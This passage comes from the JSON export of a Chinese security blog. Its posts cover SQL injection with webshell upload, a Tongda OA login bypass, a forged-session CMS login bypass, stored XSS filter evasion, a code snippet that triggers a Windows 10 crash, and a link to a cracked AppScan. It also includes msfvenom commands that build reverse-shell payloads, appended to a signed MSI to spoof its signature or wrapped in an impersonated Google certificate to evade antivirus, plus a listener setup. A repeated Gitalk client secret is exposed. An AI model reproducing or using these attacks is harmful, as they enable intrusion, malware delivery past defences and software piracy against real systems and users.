/Teacher/TeacherPf.aspx?yid=0030 ###管理员后台增加分类处存在SQL注入# /admin/Product/comstye2.aspx /admin/yk/Index.aspx 配合SQL万能密码进入后台，然后访问：###后台管理编辑器任意文件上传上传文件 Burp抓包重放数据 模块，可以看到上传的地址； 访问路径 就是大马的地址WOW GETSHELL! var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"CVE-2021-21972","slug":"CVE-2021-21972","date":"2021-03-07T13:56:13.000Z","updated":"2021-03-09T10:59:19.844Z","comments":true,"path":"2021/03/07/CVE-2021-21972/","link":"","permalink":"http://bo.vuvhz.top/2021/03/07/CVE-2021-21972/","excerpt":"","text":"#CVE-2021-21972 Vmware vCenter 图形化POC批量扫描工具#工具界面： （直接把.txt文件拖入进去就可以。。。）###下载地址：https://github.com/admin360bug/GUI-POC-EXP/####关于EXP：已编译完成，脱离python环境可用的工具 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"通达OAv11.7在线用户登录漏洞","slug":"通达OA登录漏洞","date":"2021-03-07T13:54:15.000Z","updated":"2021-03-09T10:41:18.732Z","comments":true,"path":"2021/03/07/通达OA登录漏洞/","link":"","permalink":"http://bo.vuvhz.top/2021/03/07/%E9%80%9A%E8%BE%BEOA%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"#通达OA v11.7 在线用户登录漏洞###漏洞描述通达OA v11.7 中存在某接口查询在线用户，当用户在线时会返回 PHPSESSION使其可登录后台系统###漏洞影响通达OA < v11.7 ###环境搭建https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe下载后按步骤安装即可###漏洞复现漏洞有关文件 MYOA\\webroot\\mobile\\auth_mobi.php","categories":[],"tags":[]},{"title":"Appscan_10.0.4破解版","slug":"Appscan-10-0-4破解版","date":"2021-03-07T13:47:41.000Z","updated":"2021-03-07T13:48:17.132Z","comments":true,"path":"2021/03/07/Appscan-10-0-4破解版/","link":"","permalink":"http://bo.vuvhz.top/2021/03/07/Appscan-10-0-4%E7%A0%B4%E8%A7%A3%E7%89%88/","excerpt":"","text":"#AppScan_10.0.4破解版 链接：链接：https://pan.baidu.com/s/1RarULLWDgijG3E1_KKMUBw提取码：53g8 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"foha批量查询脚本","slug":"foha","date":"2021-01-30T09:05:49.000Z","updated":"2021-03-07T13:32:23.371Z","comments":true,"path":"2021/01/30/foha/","link":"","permalink":"http://bo.vuvhz.top/2021/01/30/foha/","excerpt":"","text":"#分享一下fofa的批量查询脚本 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859#!/usr/bin/python3# -*- coding: utf-8 -*-# Author : 诚默import base64import jsonimport timeimport pandas as pdimport requestsfofa_mail = ''#通过fofa个人资料中获取fofa_key = ''#fofa_list = ['title', 'header', 'body', 'domain', 'icon_hash', 'host', 'port', 'ip', 'status_code', 'protocol', 'city', 'region', 'country', 'cert', 'banner', 'typ', 'os', 'server', 'app', 'after', 'asn', 'org', 'base_protocol', 'is_ipv6', 'is_domain', 'ip_ports', 'port_size', 'port_size_gt', 'port_size_lt', 'ip_country', 'ip_region', 'ip_city', 'ip_after', 'ip_before' ]def fofaapi(select): # 进行调用 page = 1 # 爬取几页数据，size为每页个数 size = 10 # 高级会员最大爬取前10000个 fields = "host,ip,port,title,country_name" # 返回的数据列 full = 'false' # 显示所有的数据，false显示当年的 base64_str = base64.b64encode(select.encode("utf-8")).decode('utf-8') api_url = 'https://fofa.so/api/v1/search/all?email=' + fofa_mail + '&key=' + fofa_key + '&qbase64=' + base64_str + '&fields=' + fields + '&size=' + str( size) + '&page=' + str(page) + '&full=' + full r = requests.get(api_url) # 提交请求 text = json.loads(r.text.encode('gbk', 'ignore').decode('gbk')) # 获得dict数据 print(text) # 后续为写入表 columns = fields.split(',') # 数据列名 excel_list = text['results'] excel_list.insert(0, ["查询语句：" + str(select) + " 页数：" + str(page) + " 每页：" + str(size)]) # 写入初始的查询语句 dt = pd.DataFrame(excel_list, columns=columns) file = 'fofa' + time.strftime('%Y%m%d%H%M%S', time.localtime(time.time())) # 文件名为fofa+时间 dt.to_excel(file + ".xlsx", index=1, engine='xlsxwriter') #return textdef getselect(str):#格式化 select = "" comma_list = str.split(',') # 以逗号分组 （ip=1.1.1.1 | domain=baidu.com） for item in comma_list: equal_list = item.split('=') # 等号分组 ip | 1.1.1.1 if equal_list[0] in fofa_list: # 属性存在，等号合规 select += item + " && " else: return False return select.rstrip(' && ') # 去除多余符号def main(): str = "domain=baidu.com" str1 = "ip=61.135.186.217,domain=baidu.com" if getselect(str1) != False: # 进行数据处理，数据合规就进行下一步操作 fofaapi(getselect(str1))if __name__ == '__main__': main() 文件结果如下，可根据需求改动 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"存储xss挖掘经验","slug":"xss","date":"2021-01-30T08:58:23.000Z","updated":"2021-03-07T13:33:01.475Z","comments":true,"path":"2021/01/30/xss/","link":"","permalink":"http://bo.vuvhz.top/2021/01/30/xss/","excerpt":"","text":"#存储xss挖掘经验 结合这几天挖掘的src xss稍微总结一下存储xss的挖掘经验 出现位置#一般都是有框就X 例如站内信功能 评论功能等个人喜欢先填写一个<img src=1>看看解析不解析img标签 或者实体编码 进行判断xss的存在，有些厂商一般不会ban img a这种标签，只会ban alert，或者onclick,onload,onerror这种事件属性， 有些地方会进行一个前台校验输入是否合法 但是后端没有进行判断，例如下图 我们就可以在前台输入一个正常的数据例如aaa都可以 然后抓包修改 就可以进行绕过 或者还有一些地方有输入长度限制，可以f12修改一下maxlength看看输入payload之后提交后能不能正常的进行保存 如果能进行保存成功的话那就又是前端校验 或者通过事件进行缩短payload #payload的绕过 https://www.cnblogs.com/H4ck3R-XiX/p/12732356.html 我觉得这篇文章是一篇不错的总结 如果输入一个很明显是有害的payload如：<script>alert('xss')</script 之类的可能会将script alert这类危险字符进行一个分割或者加点之类的 这里script被分割 无法触发payload 这里用点进行了分割 这时候我们可以进行一个编码绕过 例如<a href=javascript:alert(/xss/)>aaaa 至于编码绕过上面这篇文章已经总结的很详细了。 #如何触发payload?耐心很重要，例如上面的一个例子 我将自己的姓名修改为xss payload发现并没有解析 差点让我痛失一个中危- - 后面我发现这个站有评论功能 我奇怪的发现当我随便评论一个东西的时候 他解析了img标签 也就是说评论时是带姓名来评论的 而这里又没有任何的过滤 可以说是形成了一个二次xss吧 接下就只需要将payload替换成弹窗或者引入外部js什么的 就能直接起飞了 因为这个位置没有任何的过滤 还有一种常见的就是厂商在前台进行了校验 而忽略了后台的校验 例如 我一般喜欢用两个账号测试xss 一个账号发布 然后另一个账号测试 在评论处输入payload是没什么反应的 但是当我进入发布者的后台时候发现弹窗了这样一个存储xss也就到手了 总之就是多去测试 尽量寻找可能触发payload的地方 遇到实体编码的地方就可以去寻找其他一些可能触发payload的位置 [转] var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"win10蓝屏bug","slug":"win10蓝屏bug","date":"2021-01-30T08:14:21.000Z","updated":"2021-03-07T13:32:42.879Z","comments":true,"path":"2021/01/30/win10蓝屏bug/","link":"","permalink":"http://bo.vuvhz.top/2021/01/30/win10%E8%93%9D%E5%B1%8Fbug/","excerpt":"","text":"#win10蓝屏bug最近win10 的蓝屏bug最近很火，在google浏览器中输入： \\\\.\\globalroot\\device\\condrv\\kernelconnect 就会蓝屏，亲测有效； 看到吾爱中分析解释说是condrv驱动里的派遣函数CdpDispatchCleanup发生了空指针引用，而后触发了蓝屏。 因为谷歌浏览器调用了GetFileAttributesExW函数，然后转入ntdll,接着走进了内核，然后调用了condrv的派遣函数。 12345678<html><head></head><body>><script>document.location = '\\\\\\\\.\\\\globalroot\\\\device\\\\condrv\\\\kernelconnect';</script></body></html> 有师傅分享了代码： 12345678910/ BSOD.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。//#include <iostream>#include <Windows.h>int main(){ WCHAR fileName[] = L"\\\\\\\\.\\\\globalroot\\\\device\\\\condrv\\\\kernelconnect"; WIN32_FILE_ATTRIBUTE_DATA data; GetFileAttributesEx(fileName, GetFileExInfoStandard, &data);} 直接编译成exe文件： 运行生成的exe文件，成功蓝屏：好像没看到可以利用此漏洞来远程执行代码的，希望win10早点修复这个bug呗。 参考链接：https://www.52pojie.cn/thread-1354077-1-1.html var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"CVE-2020-1380签名伪造","slug":"CVE-2020-1380签名伪造","date":"2020-11-17T10:17:01.000Z","updated":"2021-03-07T13:32:07.379Z","comments":true,"path":"2020/11/17/CVE-2020-1380签名伪造/","link":"","permalink":"http://bo.vuvhz.top/2020/11/17/CVE-2020-1380%E7%AD%BE%E5%90%8D%E4%BC%AA%E9%80%A0/","excerpt":"","text":"#CVE-2020-1380签名伪造在之前的文章中，冷逸曾写过一篇《使用CVE-2020-0601进行伪造签名》的文章，里面利用windows其对椭圆曲线的逻辑处理错误，可以为任何程序添加可信的数字签名。而今天介绍的是冷逸另一种更加简单的方法，来添加数字签名，漏洞编号为CVE-2020-1380也称之为GlueBall。利用该漏洞可绕过安全特征，不正确地加载已签名文件。在攻击场景中，攻击者能够绕过旨在阻止加载不正确签名文件的安全特征。我们来看一下这个漏洞，众所周知，在以管理员权限运行时，windows会弹出uac的提示，而拥有数字签名的程序触发uac时，为蓝色. 非数字签名的为黄色 而众所周知比较常用的数字签名伪造工具sigthief是可以进行签名伪造的，该工具伪造的签名在国内的一些在线测试平台上会显示签名正常，而在VT则会显示无效签名，在系统中也会显示签名无效. 而利用该漏洞签名的文件，则会显示正常. 注：VT已针对该漏洞进行更新，VT可成功检测该漏洞攻击,会显示invaild-signature 下面即对该漏洞进行复现，该漏洞的复现过程很简单，准备一个带有数字签名的msi文件，一个恶意的jar文件(可msf生成)，然后合成即可，思路如下. msfvenom -p java/meterpreter/reverse_https LHOST= LPORT= -f jar -o xxx.jar 然后制作文件 copy /b xxx.msi + xxx.jar xxx.jar 成功获取session。其余java编写文件都可以使用该方法进行制作，注：只能为java文件 导致该漏洞的原因为当 Windows 读取 MSI 文件时，它会从文件开头开始读取，一直到有效的 MSI 签名末尾结束并舍弃其它部分。因此在检测到合法的 MSI 文件结构后，它会忽略被附加的数据，而不管它是什么。而JAR 文件只不过是 ZIP 文件，并且在执行时由 Java 运行时从文件末尾开始读取，直到检测到有效 ZIP 文件结构的开头为止，然后它将丢弃文件的其余部分。这最后将造成indows 开始从开头读取而 JAVA 从末尾读取时,windows认为其是一个签名文件，而java文件也可以正常运行。 现windows已更新了相关补丁，主要为msisip.dll该文件，加入了NeedFileSizeVerification和VerifyFileSize两个逻辑，更新系统即可防止该类攻击。 参考文章：https://blog.csdn.net/smellycat000/article/details/108091187https://www.secrss.com/articles/24763https://www.securityinbits.com/malware-analysis/interesting-tactic-by-ratty-adwind-distribution-of-jar-appended-to-signed-msi/https://www.chainnews.com/zh-hant/articles/041869869233.htmhttps://wwws.nightwatchcybersecurity.com/2019/01/16/thoughts-on-the-msi-jar-authenticode-bypass/ var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"httpsms","slug":"httpsms","date":"2020-11-17T10:00:38.000Z","updated":"2021-03-07T13:32:33.655Z","comments":true,"path":"2020/11/17/httpsms/","link":"","permalink":"http://bo.vuvhz.top/2020/11/17/httpsms/","excerpt":"","text":"#https证书绕过杀软msf生成证书（要能连上google，用俺vps来搞）use auxiliary/gather/impersonate_ssl set RHOST www.google.com run生成msf攻击载荷：msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.226.136 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=/root/www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f py -o pentestlab.py然后msf监听： use exploit/multi/handler set payload windows/meterpreter/reverse_winhttps set LHOST 192.168.226.136 set LPORT 443 set HandlerSSLCert /root/www.google.com.pem (设置证书) set StagerVerifySSLCert true exploit -j 然后在win7上运行这个pentestlab.py 360杀毒，安全卫士无反应。 全自动工具：https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL 参考：https://pentestlab.blog/category/defense-evasion/ var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"cms","slug":"cms漏洞","date":"2020-11-17T09:36:28.000Z","updated":"2021-03-07T13:31:53.691Z","comments":true,"path":"2020/11/17/cms漏洞/","link":"","permalink":"http://bo.vuvhz.top/2020/11/17/cms%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"#cms后台登录绕过@miko 1.随便打开一个index.php，然后发送post请求，创建seions.POST:_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=99999999999此时就成功地创建了SESION变量.2.创建完成后，登录后台.3.成功！ var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"about","slug":"about","date":"2020-11-17T09:27:45.000Z","updated":"2021-03-07T13:31:45.419Z","comments":true,"path":"2020/11/17/about/","link":"","permalink":"http://bo.vuvhz.top/2020/11/17/about/","excerpt":"","text":"#I’m miko魔域魂窟是我的github博客. 你可以在这里学到东西. var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]}],"categories":[],"tags":[]}